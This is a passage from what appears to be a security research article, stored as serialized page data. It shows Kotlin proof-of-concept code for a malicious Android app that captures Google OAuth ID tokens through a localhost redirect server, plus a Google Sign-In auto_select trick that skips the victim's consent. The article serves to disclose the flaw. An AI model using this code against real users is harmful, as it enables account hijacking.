server:",{"type":25,"tag":206,"props":104090,"children":104094},{"className":104091,"code":104092,"language":104093,"meta":7,"style":7},"language-kt shiki shiki-themes slack-dark"," override fun onCreate(savedInstanceState: Bundle?){\n        super.onCreate(savedInstanceState)\n\n        // Start the Ktor web server\n        CoroutineScope(Dispatchers.IO).launch {\n            try {\n                startWebServer()\n                Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n            } catch (e: Exception) {\n                Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n            }\n        }\n\n        // Open the Google OAuth page\n        val googleOAuthUrl = \"https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=redacted&redirect_uri=http://localhost:3000/auth/index.html&response_type=id_token&scope=email&nonce=redacted&prompt=select_account&service=lso&o2v=2&flowName=GeneralOAuthFlow\"\n        val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(googleOAuthUrl))\n        startActivity(browserIntent)\n    }\n\n    private fun startWebServer() {\n        embeddedServer(CIO, port = 3000) {\n            routing {\n                get(\"{...}\") {\n                    call.respondHtml {\n                        head {\n                            meta(charset = \"UTF-8\")\n                            meta(name = \"viewport\", content = \"width=device-width, initial-scale=1.0\")\n                            title(\"OAuth Redirect\")\n                        }\n                        body {\n                            h1 { +\"Google OAuth Redirect\" }\n                            script {\n                                +\"document.body.innerText = location.hash;\"\n                            }\n                        }\n                    }\n                }\n            }\n        }.start(wait = true)\n    }\n","kt",[104095],{"type":25,"tag":82,"props":104096,"children":104097},{"__ignoreMap":7},[104098,104127,104146,104153,104160,104179,104190,104201,104232,104255,104302,104309,104316,104323,104330,104350,104381,104392,104399,104406,104425,104448,104459,104478,104493,104504,104527,104562,104581,104588,104599,104622,104633,104645,104652,104659,104666,104673,104680,104707],{"type":25,"tag":216,"props":104099,"children":104100},{"class":6922,"line":6923},[104101,104106,104110,104114,104118,104122],{"type":25,"tag":216,"props":104102,"children":104103},{"style":6936},[104104],{"type":31,"value":104105}," override",{"type":25,"tag":216,"props":104107,"children":104108},{"style":6936},[104109],{"type":31,"value":10158},{"type":25,"tag":216,"props":104111,"children":104112},{"style":7047},[104113],{"type":31,"value":74423},{"type":25,"tag":216,"props":104115,"children":104116},{"style":6964},[104117],{"type":31,"value":74428},{"type":25,"tag":216,"props":104119,"children":104120},{"style":7375},[104121],{"type":31,"value":74433},{"type":25,"tag":216,"props":104123,"children":104124},{"style":6964},[104125],{"type":31,"value":104126},"?){\n",{"type":25,"tag":216,"props":104128,"children":104129},{"class":6922,"line":6769},[104130,104134,104138,104142],{"type":25,"tag":216,"props":104131,"children":104132},{"style":6936},[104133],{"type":31,"value":74446},{"type":25,"tag":216,"props":104135,"children":104136},{"style":6964},[104137],{"type":31,"value":179},{"type":25,"tag":216,"props":104139,"children":104140},{"style":7047},[104141],{"type":31,"value":74455},{"type":25,"tag":216,"props":104143,"children":104144},{"style":6964},[104145],{"type":31,"value":74460},{"type":25,"tag":216,"props":104147,"children":104148},{"class":6922,"line":6778},[104149],{"type":25,"tag":216,"props":104150,"children":104151},{"emptyLinePlaceholder":16},[104152],{"type":31,"value":7642},{"type":25,"tag":216,"props":104154,"children":104155},{"class":6922,"line":7005},[104156],{"type":25,"tag":216,"props":104157,"children":104158},{"style":6927},[104159],{"type":31,"value":74475},{"type":25,"tag":216,"props":104161,"children":104162},{"class":6922,"line":7110},[104163,104167,104171,104175],{"type":25,"tag":216,"props":104164,"children":104165},{"style":7047},[104166],{"type":31,"value":74483},{"type":25,"tag":216,"props":104168,"children":104169},{"style":6964},[104170],{"type":31,"value":74488},{"type":25,"tag":216,"props":104172,"children":104173},{"style":7047},[104174],{"type":31,"value":74493},{"type":25,"tag":216,"props":104176,"children":104177},{"style":6964},[104178],{"type":31,"value":7241},{"type":25,"tag":216,"props":104180,"children":104181},{"class":6922,"line":7216},[104182,104186],{"type":25,"tag":216,"props":104183,"children":104184},{"style":6973},[104185],{"type":31,"value":74505},{"type":25,"tag":216,"props":104187,"children":104188},{"style":6964},[104189],{"type":31,"value":7241},{"type":25,"tag":216,"props":104191,"children":104192},{"class":6922,"line":7244},[104193,104197],{"type":25,"tag":216,"props":104194,"children":104195},{"style":7047},[104196],{"type":31,"value":74517},{"type":25,"tag":216,"props":104198,"children":104199},{"style":6964},[104200],{"type":31,"value":11687},{"type":25,"tag":216,"props":104202,"children":104203},{"class":6922,"line":7257},[104204,104208,104212,104216,104220,104224,104228],{"type":25,"tag":216,"props":104205,"children":104206},{"style":6964},[104207],{"type":31,"value":74529},{"type":25,"tag":216,"props":104209,"children":104210},{"style":7047},[104211],{"type":31,"value":74534},{"type":25,"tag":216,"props":104213,"children":104214},{"style":6964},[104215],{"type":31,"value":1850},{"type":25,"tag":216,"props":104217,"children":104218},{"style":8205},[104219],{"type":31,"value":74543},{"type":25,"tag":216,"props":104221,"children":104222},{"style":6964},[104223],{"type":31,"value":7026},{"type":25,"tag":216,"props":104225,"children":104226},{"style":8205},[104227],{"type":31,"value":74552},{"type":25,"tag":216,"props":104229,"children":104230},{"style":6964},[104231],{"type":31,"value":7107},{"type":25,"tag":216,"props":104233,"children":104234},{"class":6922,"line":7275},[104235,104239,104243,104247,104251],{"type":25,"tag":216,"props":104236,"children":104237},{"style":6964},[104238],{"type":31,"value":74564},{"type":25,"tag":216,"props":104240,"children":104241},{"style":6936},[104242],{"type":31,"value":52380},{"type":25,"tag":216,"props":104244,"children":104245},{"style":6964},[104246],{"type":31,"value":74573},{"type":25,"tag":216,"props":104248,"children":104249},{"style":7375},[104250],{"type":31,"value":74578},{"type":25,"tag":216,"props":104252,"children":104253},{"style":6964},[104254],{"type":31,"value":18761},{"type":25,"tag":216,"props":104256,"children":104257},{"class":6922,"line":7296},[104258,104262,104266,104270,104274,104278,104282,104286,104290,104294,104298],{"type":25,"tag":216,"props":104259,"children":104260},{"style":6964},[104261],{"type":31,"value":74529},{"type":25,"tag":216,"props":104263,"children":104264},{"style":7047},[104265],{"type":31,"value":2399},{"type":25,"tag":216,"props":104267,"children":104268},{"style":6964},[104269],{"type":31,"value":1850},{"type":25,"tag":216,"props":104271,"children":104272},{"style":8205},[104273],{"type":31,"value":74543},{"type":25,"tag":216,"props":104275,"children":104276},{"style":6964},[104277],{"type":31,"value":7026},{"type":25,"tag":216,"props":104279,"children":104280},{"style":8205},[104281],{"type":31,"value":74610},{"type":25,"tag":216,"props":104283,"children":104284},{"style":6936},[104285],{"type":31,"value":38071},{"type":25,"tag":216,"props":104287,"children":104288},{"style":6953},[104289],{"type":31,"value":74619},{"type":25,"tag":216,"props":104291,"children":104292},{"style":6936},[104293],{"type":31,"value":38103},{"type":25,"tag":216,"props":104295,"children":104296},{"style":8205},[104297],{"type":31,"value":24020},{"type":25,"tag":216,"props":104299,"children":104300},{"style":6964},[104301],{"type":31,"value":74632},{"type":25,"tag":216,"props":104303,"children":104304},{"class":6922,"line":7305},[104305],{"type":25,"tag":216,"props":104306,"children":104307},{"style":6964},[104308],{"type":31,"value":62852},{"type":25,"tag":216,"props":104310,"children":104311},{"class":6922,"line":7557},[104312],{"type":25,"tag":216,"props":104313,"children":104314},{"style":6964},[104315],{"type":31,"value":7302},{"type":25,"tag":216,"props":104317,"children":104318},{"class":6922,"line":7574},[104319],{"type":25,"tag":216,"props":104320,"children":104321},{"emptyLinePlaceholder":16},[104322],{"type":31,"value":7642},{"type":25,"tag":216,"props":104324,"children":104325},{"class":6922,"line":7591},[104326],{"type":25,"tag":216,"props":104327,"children":104328},{"style":6927},[104329],{"type":31,"value":74661},{"type":25,"tag":216,"props":104331,"children":104332},{"class":6922,"line":7604},[104333,104337,104341,104345],{"type":25,"tag":216,"props":104334,"children":104335},{"style":6936},[104336],{"type":31,"value":74669},{"type":25,"tag":216,"props":104338,"children":104339},{"style":6964},[104340],{"type":31,"value":74674},{"type":25,"tag":216,"props":104342,"children":104343},{"style":6953},[104344],{"type":31,"value":266},{"type":25,"tag":216,"props":104346,"children":104347},{"style":8205},[104348],{"type":31,"value":104349}," \"https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=redacted&redirect_uri=http://localhost:3000/auth/index.html&response_type=id_token&scope=email&nonce=redacted&prompt=select_account&service=lso&o2v=2&flowName=GeneralOAuthFlow\"\n",{"type":25,"tag":216,"props":104351,"children":104352},{"class":6922,"line":7613},[104353,104357,104361,104365,104369,104373,104377],{"type":25,"tag":216,"props":104354,"children":104355},{"style":6936},[104356],{"type":31,"value":74669},{"type":25,"tag":216,"props":104358,"children":104359},{"style":6964},[104360],{"type":31,"value":74695},{"type":25,"tag":216,"props":104362,"children":104363},{"style":6953},[104364],{"type":31,"value":266},{"type":25,"tag":216,"props":104366,"children":104367},{"style":7047},[104368],{"type":31,"value":74704},{"type":25,"tag":216,"props":104370,"children":104371},{"style":6964},[104372],{"type":31,"value":74709},{"type":25,"tag":216,"props":104374,"children":104375},{"style":7047},[104376],{"type":31,"value":43175},{"type":25,"tag":216,"props":104378,"children":104379},{"style":6964},[104380],{"type":31,"value":74718},{"type":25,"tag":216,"props":104382,"children":104383},{"class":6922,"line":7636},[104384,104388],{"type":25,"tag":216,"props":104385,"children":104386},{"style":7047},[104387],{"type":31,"value":74726},{"type":25,"tag":216,"props":104389,"children":104390},{"style":6964},[104391],{"type":31,"value":74731},{"type":25,"tag":216,"props":104393,"children":104394},{"class":6922,"line":7645},[104395],{"type":25,"tag":216,"props":104396,"children":104397},{"style":6964},[104398],{"type":31,"value":7311},{"type":25,"tag":216,"props":104400,"children":104401},{"class":6922,"line":7654},[104402],{"type":25,"tag":216,"props":104403,"children":104404},{"emptyLinePlaceholder":16},[104405],{"type":31,"value":7642},{"type":25,"tag":216,"props":104407,"children":104408},{"class":6922,"line":7722},[104409,104413,104417,104421],{"type":25,"tag":216,"props":104410,"children":104411},{"style":6936},[104412],{"type":31,"value":74753},{"type":25,"tag":216,"props":104414,"children":104415},{"style":6936},[104416],{"type":31,"value":10158},{"type":25,"tag":216,"props":104418,"children":104419},{"style":7047},[104420],{"type":31,"value":74762},{"type":25,"tag":216,"props":104422,"children":104423},{"style":6964},[104424],{"type":31,"value":19694},{"type":25,"tag":216,"props":104426,"children":104427},{"class":6922,"line":7730},[104428,104432,104436,104440,104444],{"type":25,"tag":216,"props":104429,"children":104430},{"style":7047},[104431],{"type":31,"value":74774},{"type":25,"tag":216,"props":104433,"children":104434},{"style":6964},[104435],{"type":31,"value":74779},{"type":25,"tag":216,"props":104437,"children":104438},{"style":6953},[104439],{"type":31,"value":266},{"type":25,"tag":216,"props":104441,"children":104442},{"style":6989},[104443],{"type":31,"value":74788},{"type":25,"tag":216,"props":104445,"children":104446},{"style":6964},[104447],{"type":31,"value":18761},{"type":25,"tag":216,"props":104449,"children":104450},{"class":6922,"line":7760},[104451,104455],{"type":25,"tag":216,"props":104452,"children":104453},{"style":7047},[104454],{"type":31,"value":74800},{"type":25,"tag":216,"props":104456,"children":104457},{"style":6964},[104458],{"type":31,"value":7241},{"type":25,"tag":216,"props":104460,"children":104461},{"class":6922,"line":7768},[104462,104466,104470,104474],{"type":25,"tag":216,"props":104463,"children":104464},{"style":6936},[104465],{"type":31,"value":74812},{"type":25,"tag":216,"props":104467,"children":104468},{"style":6964},[104469],{"type":31,"value":1850},{"type":25,"tag":216,"props":104471,"children":104472},{"style":8205},[104473],{"type":31,"value":74821},{"type":25,"tag":216,"props":104475,"children":104476},{"style":6964},[104477],{"type":31,"value":18761},{"type":25,"tag":216,"props":104479,"children":104480},{"class":6922,"line":7800},[104481,104485,104489],{"type":25,"tag":216,"props":104482,"children":104483},{"style":6964},[104484],{"type":31,"value":74833},{"type":25,"tag":216,"props":104486,"children":104487},{"style":7047},[104488],{"type":31,"value":74838},{"type":25,"tag":216,"props":104490,"children":104491},{"style":6964},[104492],{"type":31,"value":7241},{"type":25,"tag":216,"props":104494,"children":104495},{"class":6922,"line":7808},[104496,104500],{"type":25,"tag":216,"props":104497,"children":104498},{"style":7047},[104499],{"type":31,"value":74850},{"type":25,"tag":216,"props":104501,"children":104502},{"style":6964},[104503],{"type":31,"value":7241},{"type":25,"tag":216,"props":104505,"children":104506},{"class":6922,"line":7868},[104507,104511,104515,104519,104523],{"type":25,"tag":216,"props":104508,"children":104509},{"style":7047},[104510],{"type":31,"value":74862},{"type":25,"tag":216,"props":104512,"children":104513},{"style":6964},[104514],{"type":31,"value":74867},{"type":25,"tag":216,"props":104516,"children":104517},{"style":6953},[104518],{"type":31,"value":266},{"type":25,"tag":216,"props":104520,"children":104521},{"style":8205},[104522],{"type":31,"value":74876},{"type":25,"tag":216,"props":104524,"children":104525},{"style":6964},[104526],{"type":31,"value":7107},{"type":25,"tag":216,"props":104528,"children":104529},{"class":6922,"line":13001},[104530,104534,104538,104542,104546,104550,104554,104558],{"type":25,"tag":216,"props":104531,"children":104532},{"style":7047},[104533],{"type":31,"value":74862},{"type":25,"tag":216,"props":104535,"children":104536},{"style":6964},[104537],{"type":31,"value":74892},{"type":25,"tag":216,"props":104539,"children":104540},{"style":6953},[104541],{"type":31,"value":266},{"type":25,"tag":216,"props":104543,"children":104544},{"style":8205},[104545],{"type":31,"value":74901},{"type":25,"tag":216,"props":104547,"children":104548},{"style":6964},[104549],{"type":31,"value":74906},{"type":25,"tag":216,"props":104551,"children":104552},{"style":6953},[104553],{"type":31,"value":266},{"type":25,"tag":216,"props":104555,"children":104556},{"style":8205},[104557],{"type":31,"value":74915},{"type":25,"tag":216,"props":104559,"children":104560},{"style":6964},[104561],{"type":31,"value":7107},{"type":25,"tag":216,"props":104563,"children":104564},{"class":6922,"line":13019},[104565,104569,104573,104577],{"type":25,"tag":216,"props":104566,"children":104567},{"style":7047},[104568],{"type":31,"value":74927},{"type":25,"tag":216,"props":104570,"children":104571},{"style":6964},[104572],{"type":31,"value":1850},{"type":25,"tag":216,"props":104574,"children":104575},{"style":8205},[104576],{"type":31,"value":74936},{"type":25,"tag":216,"props":104578,"children":104579},{"style":6964},[104580],{"type":31,"value":7107},{"type":25,"tag":216,"props":104582,"children":104583},{"class":6922,"line":13064},[104584],{"type":25,"tag":216,"props":104585,"children":104586},{"style":6964},[104587],{"type":31,"value":74948},{"type":25,"tag":216,"props":104589,"children":104590},{"class":6922,"line":13170},[104591,104595],{"type":25,"tag":216,"props":104592,"children":104593},{"style":7047},[104594],{"type":31,"value":74956},{"type":25,"tag":216,"props":104596,"children":104597},{"style":6964},[104598],{"type":31,"value":7241},{"type":25,"tag":216,"props":104600,"children":104601},{"class":6922,"line":27455},[104602,104606,104610,104614,104618],{"type":25,"tag":216,"props":104603,"children":104604},{"style":7047},[104605],{"type":31,"value":74968},{"type":25,"tag":216,"props":104607,"children":104608},{"style":6964},[104609],{"type":31,"value":13542},{"type":25,"tag":216,"props":104611,"children":104612},{"style":6953},[104613],{"type":31,"value":3539},{"type":25,"tag":216,"props":104615,"children":104616},{"style":8205},[104617],{"type":31,"value":74981},{"type":25,"tag":216,"props":104619,"children":104620},{"style":6964},[104621],{"type":31,"value":13552},{"type":25,"tag":216,"props":104623,"children":104624},{"class":6922,"line":27490},[104625,104629],{"type":25,"tag":216,"props":104626,"children":104627},{"style":7047},[104628],{"type":31,"value":74993},{"type":25,"tag":216,"props":104630,"children":104631},{"style":6964},[104632],{"type":31,"value":7241},{"type":25,"tag":216,"props":104634,"children":104635},{"class":6922,"line":27498},[104636,104640],{"type":25,"tag":216,"props":104637,"children":104638},{"style":6953},[104639],{"type":31,"value":75005},{"type":25,"tag":216,"props":104641,"children":104642},{"style":8205},[104643],{"type":31,"value":104644},"\"document.body.innerText = location.hash;\"\n",{"type":25,"tag":216,"props":104646,"children":104647},{"class":6922,"line":27506},[104648],{"type":25,"tag":216,"props":104649,"children":104650},{"style":6964},[104651],{"type":31,"value":75018},{"type":25,"tag":216,"props":104653,"children":104654},{"class":6922,"line":27515},[104655],{"type":25,"tag":216,"props":104656,"children":104657},{"style":6964},[104658],{"type":31,"value":74948},{"type":25,"tag":216,"props":104660,"children":104661},{"class":6922,"line":27557},[104662],{"type":25,"tag":216,"props":104663,"children":104664},{"style":6964},[104665],{"type":31,"value":75033},{"type":25,"tag":216,"props":104667,"children":104668},{"class":6922,"line":27590},[104669],{"type":25,"tag":216,"props":104670,"children":104671},{"style":6964},[104672],{"type":31,"value":75041},{"type":25,"tag":216,"props":104674,"children":104675},{"class":6922,"line":27598},[104676],{"type":25,"tag":216,"props":104677,"children":104678},{"style":6964},[104679],{"type":31,"value":62852},{"type":25,"tag":216,"props":104681,"children":104682},{"class":6922,"line":27606},[104683,104687,104691,104695,104699,104703],{"type":25,"tag":216,"props":104684,"children":104685},{"style":6964},[104686],{"type":31,"value":75056},{"type":25,"tag":216,"props":104688,"children":104689},{"style":7047},[104690],{"type":31,"value":75061},{"type":25,"tag":216,"props":104692,"children":104693},{"style":6964},[104694],{"type":31,"value":75066},{"type":25,"tag":216,"props":104696,"children":104697},{"style":6953},[104698],{"type":31,"value":266},{"type":25,"tag":216,"props":104700,"children":104701},{"style":6936},[104702],{"type":31,"value":16425},{"type":25,"tag":216,"props":104704,"children":104705},{"style":6964},[104706],{"type":31,"value":7107},{"type":25,"tag":216,"props":104708,"children":104709},{"class":6922,"line":27615},[104710],{"type":25,"tag":216,"props":104711,"children":104712},{"style":6964},[104713],{"type":31,"value":7311},{"type":25,"tag":38,"props":104715,"children":104716},{},[104717],{"type":31,"value":104718},"In this case, the prompt parameter can be omitted from the URL. This way, if the victim is already logged in, the OAuth 2.0 prompt interaction will be skipped.",{"type":25,"tag":38,"props":104720,"children":104721},{},[104722,104724,104730],{"type":31,"value":104723},"If Google Sign-In (GSI) is being used, we found that it's possible to use the ",{"type":25,"tag":82,"props":104725,"children":104727},{"className":104726},[],[104728],{"type":31,"value":104729},"auto_select",{"type":31,"value":104731}," parameter to trigger automatic reauthentication and bypass user interaction:",{"type":25,"tag":206,"props":104733,"children":104735},{"className":104091,"code":104734,"language":104093,"meta":7,"style":7},"    override fun onCreate(savedInstanceState: Bundle?) {\n        super.onCreate(savedInstanceState)\n\n        CoroutineScope(Dispatchers.IO).launch {\n            try {\n                startWebServer()\n                Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n            } catch (e: Exception) {\n                Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n            }\n        }\n\n        val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(\"http://localhost:3000\"))\n        startActivity(browserIntent)\n    }\n\n    private fun startWebServer() {\n        embeddedServer(CIO, port = 3000) {\n            routing {\n                get(\"{...}\") {\n                    call.respondHtml {\n                        head {\n                            title(\"Test\")\n                            script {\n                                src = \"https://accounts.google.com/gsi/client\"\n                                attributes[\"async\"] = \"\"\n                                attributes[\"defer\"] = \"\"\n                            }\n                            script {\n                                unsafe {\n                                    +\"\"\"\n    function handleCredentialResponse(response) {\n      alert(\"credential: \" + response.credential);\n    }\n\n    window.onload = async function () {\n      const oauth_url = new URL(`https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?as=uolEFCMgoGJXBVuGdJja0XdzjrWqOE6iFaK1SBNY9Zk&client_id=redacted&scope=openid%20email%20profile&response_type=id_token&gsiwebsdk=gis_attributes&redirect_uri=http%3A%2F%2Flocalhost%3A3000&response_mode=form_post&origin=http%3A%2F%2Flocalhost%3A3000&display=popup&prompt=select_account&gis_params=ChFodHRwczovL2F6Yml0LmNvbRIRaHR0cHM6Ly9hemJpdC5jb20YByordW9sRUZDTWdvR0pYQlZ1R2RKamEwWGR6anJXcU9FNmlGYUsxU0JOWTlaazJINzE3OTQyNTg0NjQyLXVrb25tbDZkNXM0MjJrZWVpa2RmMTJwdnV1aG1sOWYyLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tOAFCQDI0NDlkNGMwMTI3NDQxNGRlMzg5YjFlYjE1MzFmYTAxYTdjM2M5MTFhOTMxNzIxNGJhZTFmODkzNjE2MzIxZDA&service=lso&o2v=1&flowName=GeneralOAuthFlow`);\n      const client_id = oauth_url.searchParams.get(\"client_id\");\n      google.accounts.id.initialize({\n        client_id: client_id,\n        callback: handleCredentialResponse,\n        auto_select: true\n      });\n\n      google.accounts.id.renderButton(\n        document.getElementById(\"g_id_signin\"),\n        { theme: \"outline\", size: \"large\" }\n      );\n\n      google.accounts.id.prompt();\n    };\n                                    \"\"\".trimIndent()\n                                }\n                            }\n                        }\n                        body {\n                            h1 { +\"Login here:\" }\n                            div {\n                                id = \"g_id_signin\"\n                            }\n                        }\n                    }\n                }\n            }\n        }.start(wait = true)\n    }\n",[104736],{"type":25,"tag":82,"props":104737,"children":104738},{"__ignoreMap":7},[104739,104766,104785,104792,104811,104822,104833,104864,104887,104934,104941,104948,104955,104995,105006,105013,105020,105039,105062,105073,105092,105107,105118,105138,105149,105166,105192,105216,105223,105234,105246,105259,105267,105275,105282,105289,105297,105305,105313,105321,105329,105337,105345,105352,105359,105367,105375,105383,105390,105397,105405,105412,105433,105441,105448,105455,105466,105490,105502,105519,105526,105533,105541,105549,105557,105585],{"type":25,"tag":216,"props":104740,"children":104741},{"class":6922,"line":6923},[104742,104746,104750,104754,104758,104762],{"type":25,"tag":216,"props":104743,"children":104744},{"style":6936},[104745],{"type":31,"value":74414},{"type":25,"tag":216,"props":104747,"children":104748},{"style":6936},[104749],{"type":31,"value":10158},{"type":25,"tag":216,"props":104751,"children":104752},{"style":7047},[104753],{"type":31,"value":74423},{"type":25,"tag":216,"props":104755,"children":104756},{"style":6964},[104757],{"type":31,"value":74428},{"type":25,"tag":216,"props":104759,"children":104760},{"style":7375},[104761],{"type":31,"value":74433},{"type":25,"tag":216,"props":104763,"children":104764},{"style":6964},[104765],{"type":31,"value":74438},{"type":25,"tag":216,"props":104767,"children":104768},{"class":6922,"line":6769},[104769,104773,104777,104781],{"type":25,"tag":216,"props":104770,"children":104771},{"style":6936},[104772],{"type":31,"value":74446},{"type":25,"tag":216,"props":104774,"children":104775},{"style":6964},[104776],{"type":31,"value":179},{"type":25,"tag":216,"props":104778,"children":104779},{"style":7047},[104780],{"type":31,"value":74455},{"type":25,"tag":216,"props":104782,"children":104783},{"style":6964},[104784],{"type":31,"value":74460},{"type":25,"tag":216,"props":104786,"children":104787},{"class":6922,"line":6778},[104788],{"type":25,"tag":216,"props":104789,"children":104790},{"emptyLinePlaceholder":16},[104791],{"type":31,"value":7642},{"type":25,"tag":216,"props":104793,"children":104794},{"class":6922,"line":7005},[104795,104799,104803,104807],{"type":25,"tag":216,"props":104796,"children":104797},{"style":7047},[104798],{"type":31,"value":74483},{"type":25,"tag":216,"props":104800,"children":104801},{"style":6964},[104802],{"type":31,"value":74488},{"type":25,"tag":216,"props":104804,"children":104805},{"style":7047},[104806],{"type":31,"value":74493},{"type":25,"tag":216,"props":104808,"children":104809},{"style":6964},[104810],{"type":31,"value":7241},{"type":25,"tag":216,"props":104812,"children":104813},{"class":6922,"line":7110},[104814,104818],{"type":25,"tag":216,"props":104815,"children":104816},{"style":6973},[104817],{"type":31,"value":74505},{"type":25,"tag":216,"props":104819,"children":104820},{"style":6964},[104821],{"type":31,"value":7241},{"type":25,"tag":216,"props":104823,"children":104824},{"class":6922,"line":7216},[104825,104829],{"type":25,"tag":216,"props":104826,"children":104827},{"style":7047},[104828],{"type":31,"value":74517},{"type":25,"tag":216,"props":104830,"children":104831},{"style":6964},[104832],{"type":31,"value":11687},{"type":25,"tag":216,"props":104834,"children":104835},{"class":6922,"line":7244},[104836,104840,104844,104848,104852,104856,104860],{"type":25,"tag":216,"props":104837,"children":104838},{"style":6964},[104839],{"type":31,"value":74529},{"type":25,"tag":216,"props":104841,"children":104842},{"style":7047},[104843],{"type":31,"value":74534},{"type":25,"tag":216,"props":104845,"children":104846},{"style":6964},[104847],{"type":31,"value":1850},{"type":25,"tag":216,"props":104849,"children":104850},{"style":8205},[104851],{"type":31,"value":74543},{"type":25,"tag":216,"props":104853,"children":104854},{"style":6964},[104855],{"type":31,"value":7026},{"type":25,"tag":216,"props":104857,"children":104858},{"style":8205},[104859],{"type":31,"value":74552},{"type":25,"tag":216,"props":104861,"children":104862},{"style":6964},[104863],{"type":31,"value":7107},{"type":25,"tag":216,"props":104865,"children":104866},{"class":6922,"line":7257},[104867,104871,104875,104879,104883],{"type":25,"tag":216,"props":104868,"children":104869},{"style":6964},[104870],{"type":31,"value":74564},{"type":25,"tag":216,"props":104872,"children":104873},{"style":6936},[104874],{"type":31,"value":52380},{"type":25,"tag":216,"props":104876,"children":104877},{"style":6964},[104878],{"type":31,"value":74573},{"type":25,"tag":216,"props":104880,"children":104881},{"style":7375},[104882],{"type":31,"value":74578},{"type":25,"tag":216,"props":104884,"children":104885},{"style":6964},[104886],{"type":31,"value":18761},{"type":25,"tag":216,"props":104888,"children":104889},{"class":6922,"line":7275},[104890,104894,104898,104902,104906,104910,104914,104918,104922,104926,104930],{"type":25,"tag":216,"props":104891,"children":104892},{"style":6964},[104893],{"type":31,"value":74529},{"type":25,"tag":216,"props":104895,"children":104896},{"style":7047},[104897],{"type":31,"value":2399},{"type":25,"tag":216,"props":104899,"children":104900},{"style":6964},[104901],{"type":31,"value":1850},{"type":25,"tag":216,"props":104903,"children":104904},{"style":8205},[104905],{"type":31,"value":74543},{"type":25,"tag":216,"props":104907,"children":104908},{"style":6964},[104909],{"type":31,"value":7026},{"type":25,"tag":216,"props":104911,"children":104912},{"style":8205},[104913],{"type":31,"value":74610},{"type":25,"tag":216,"props":104915,"children":104916},{"style":6936},[104917],{"type":31,"value":38071},{"type":25,"tag":216,"props":104919,"children":104920},{"style":6953},[104921],{"type":31,"value":74619},{"type":25,"tag":216,"props":104923,"children":104924},{"style":6936},[104925],{"type":31,"value":38103},{"type":25,"tag":216,"props":104927,"children":104928},{"style":8205},[104929],{"type":31,"value":24020},{"type":25,"tag":216,"props":104931,"children":104932},{"style":6964},[104933],{"type":31,"value":74632},{"type":25,"tag":216,"props":104935,"children":104936},{"class":6922,"line":7296},[104937],{"type":25,"tag":216,"props":104938,"children":104939},{"style":6964},[104940],{"type":31,"value":62852},{"type":25,"tag":216,"props":104942,"children":104943},{"class":6922,"line":7305},[104944],{"type":25,"tag":216,"props":104945,"children":104946},{"style":6964},[104947],{"type":31,"value":7302},{"type":25,"tag":216,"props":104949,"children":104950},{"class":6922,"line":7557},[104951],{"type":25,"tag":216,"props":104952,"children":104953},{"emptyLinePlaceholder":16},[104954],{"type":31,"value":7642},{"type":25,"tag":216,"props":104956,"children":104957},{"class":6922,"line":7574},[104958,104962,104966,104970,104974,104978,104982,104986,104991],{"type":25,"tag":216,"props":104959,"children":104960},{"style":6936},[104961],{"type":31,"value":74669},{"type":25,"tag":216,"props":104963,"children":104964},{"style":6964},[104965],{"type":31,"value":74695},{"type":25,"tag":216,"props":104967,"children":104968},{"style":6953},[104969],{"type":31,"value":266},{"type":25,"tag":216,"props":104971,"children":104972},{"style":7047},[104973],{"type":31,"value":74704},{"type":25,"tag":216,"props":104975,"children":104976},{"style":6964},[104977],{"type":31,"value":74709},{"type":25,"tag":216,"props":104979,"children":104980},{"style":7047},[104981],{"type":31,"value":43175},{"type":25,"tag":216,"props":104983,"children":104984},{"style":6964},[104985],{"type":31,"value":1850},{"type":25,"tag":216,"props":104987,"children":104988},{"style":8205},[104989],{"type":31,"value":104990},"\"http://localhost:3000\"",{"type":25,"tag":216,"props":104992,"children":104993},{"style":6964},[104994],{"type":31,"value":23672},{"type":25,"tag":216,"props":104996,"children":104997},{"class":6922,"line":7591},[104998,105002],{"type":25,"tag":216,"props":104999,"children":105000},{"style":7047},[105001],{"type":31,"value":74726},{"type":25,"tag":216,"props":105003,"children":105004},{"style":6964},[105005],{"type":31,"value":74731},{"type":25,"tag":216,"props":105007,"children":105008},{"class":6922,"line":7604},[105009],{"type":25,"tag":216,"props":105010,"children":105011},{"style":6964},[105012],{"type":31,"value":7311},{"type":25,"tag":216,"props":105014,"children":105015},{"class":6922,"line":7613},[105016],{"type":25,"tag":216,"props":105017,"children":105018},{"emptyLinePlaceholder":16},[105019],{"type":31,"value":7642},{"type":25,"tag":216,"props":105021,"children":105022},{"class":6922,"line":7636},[105023,105027,105031,105035],{"type":25,"tag":216,"props":105024,"children":105025},{"style":6936},[105026],{"type":31,"value":74753},{"type":25,"tag":216,"props":105028,"children":105029},{"style":6936},[105030],{"type":31,"value":10158},{"type":25,"tag":216,"props":105032,"children":105033},{"style":7047},[105034],{"type":31,"value":74762},{"type":25,"tag":216,"props":105036,"children":105037},{"style":6964},[105038],{"type":31,"value":19694},{"type":25,"tag":216,"props":105040,"children":105041},{"class":6922,"line":7645},[105042,105046,105050,105054,105058],{"type":25,"tag":216,"props":105043,"children":105044},{"style":7047},[105045],{"type":31,"value":74774},{"type":25,"tag":216,"props":105047,"children":105048},{"style":6964},[105049],{"type":31,"value":74779},{"type":25,"tag":216,"props":105051,"children":105052},{"style":6953},[105053],{"type":31,"value":266},{"type":25,"tag":216,"props":105055,"children":105056},{"style":6989},[105057],{"type":31,"value":74788},{"type":25,"tag":216,"props":105059,"children":105060},{"style":6964},[105061],{"type":31,"value":18761},{"type":25,"tag":216,"props":105063,"children":105064},{"class":6922,"line":7654},[105065,105069],{"type":25,"tag":216,"props":105066,"children":105067},{"style":7047},[105068],{"type":31,"value":74800},{"type":25,"tag":216,"props":105070,"children":105071},{"style":6964},[105072],{"type":31,"value":7241},{"type":25,"tag":216,"props":105074,"children":105075},{"class":6922,"line":7722},[105076,105080,105084,105088],{"type":25,"tag":216,"props":105077,"children":105078},{"style":6936},[105079],{"type":31,"value":74812},{"type":25,"tag":216,"props":105081,"children":105082},{"style":6964},[105083],{"type":31,"value":1850},{"type":25,"tag":216,"props":105085,"children":105086},{"style":8205},[105087],{"type":31,